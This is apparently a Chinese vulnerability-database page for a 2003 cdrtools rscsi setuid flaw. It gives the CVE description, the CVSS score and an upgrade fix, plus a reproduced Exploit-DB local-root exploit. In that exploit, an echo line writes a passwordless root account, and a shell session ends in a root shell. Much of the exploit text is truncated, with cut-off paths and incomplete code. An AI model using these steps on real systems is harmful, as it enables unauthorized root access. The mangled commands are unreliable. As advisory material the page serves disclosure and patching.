发布时间 :2003-08-27 00:00:00
修订时间 :2016-10-17 22:36:23

[原文]rscsi in cdrtools 2.01 and earlier allows local users to overwrite arbitrary files and gain root privileges by specifying the target file as a command line argument, which is modified while rscsi is running with privileges.

[CNNVD]cdrtools rscsi覆盖文件漏洞(CNNVD-200308-192)

        cdrtools 2.01及其早期版本的rscsi存在漏洞。本地用户可以通过指定目标文件作为命令行参数覆盖任意文件并提升特权,该目标文件在rscsi以特权运行时被修改。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20030801 SRT2003-08-01-0126 - cdrtools local root exploit

- 漏洞信息

cdrtools rscsi覆盖文件漏洞
高危 未知
2003-08-27 00:00:00 2005-10-20 00:00:00
        cdrtools 2.01及其早期版本的rscsi存在漏洞。本地用户可以通过指定目标文件作为命令行参数覆盖任意文件并提升特权,该目标文件在rscsi以特权运行时被修改。

- 公告与补丁


- 漏洞信息 (22979)

CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability (EDBID:22979)
linux local
2003-08-01 Verified
0 Secure Network Operations
N/A [点击下载]

It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. 

It has been reported that a local attacker may invoke the rscsi utility to corrupt or seize group ownership of an attacker specified file. Because the rscsi utility is installed with setuid 'root' permissions by default, a local attacker may harness this vulnerability to achieve elevated privileges.

$ echo C`echo -e 
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | 
/opt/schily/sbin/rscsi /tmp/lala

[kf@vegeta kf]$ ls -al /etc/
ls: /etc/ No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.o
[kf@vegeta kf]$ ls -al
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/
Garbage command
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/
[kf@vegeta kf]$ echo /home/kf/ > /etc/
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/
rm: remove regular file `/etc/'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)		

- 漏洞信息

cdrtools cdrecord rscsi Arbitrary File Overwrite Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

cdrecord in cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the rscsi helper binary is installed setuid root. By specifying the target file as a command line argument, a malicious user could overwrite arbitrary files to gain root privileges resulting in a loss of integrity.

- 时间线

2003-08-01 Unknow
2003-08-01 Unknow

- 解决方案

Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者